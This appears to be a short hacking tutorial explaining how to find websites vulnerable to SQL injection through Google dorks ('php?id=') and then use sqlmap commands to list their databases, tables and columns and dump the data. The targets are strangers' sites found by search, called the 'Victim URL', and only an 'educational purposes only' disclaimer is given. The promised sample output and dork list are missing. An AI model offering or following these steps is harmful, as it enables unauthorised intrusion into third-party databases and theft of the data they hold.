, Structured Query Language, is a programming language that allows the user to manage data in a relational database management system (RDBMS) through the use of specially crafted strings. Although great for functionality, it can be disastrous if configured/crafted incorrectly. We can exploit this using the pentesting tool SQLmap.SQLmap is a penetration testing tool that automates the process of exploiting SQL injection
flaws and SQL database takeover. More information on SQLmap can be found using Google, or the option -h. Requirements:
-Basic understanding of SQL-SQLmap-Common SenseThis is for educational and research purposes only! Do not attempt to violate the law with anything contained here. Step 1: Identifying the Target
To find a possibly vulnerable site, we'll Google dork search the term: "php?id=". A dork is an advance search using Google parameters such as "", site:, and filetype:A potentially vulnerable site looks something like this: https://mytarget.com/info.php?id=1 Step 2: Database Enumeration
Now that we found a target, let's identify the databases.
sqlmap -u $url --batch --dbs
where $url is the target url.
We have the database names; let's use this information to get the tables.
sqlmap -u $url --batch --table -D $databasename
Where $url is the Victim URL and $databasename is the name of the database.
With that information, we can discover the columns.
sqlmap -u $url --columns -D $databasename -T $tablename
Where $url is the Victim URL, $databasename is the name of the database, and $tablename is the name of the table. Step 3: The Dump
Now that we've found our target, let's dump what we have.
sqlmap -u $url --dump -D $databasename -T $tablename
And, we'll get something like this:
That's it! I'll be posting again, so stay tuned!Bonus: Here's a list of other popular Google dork queries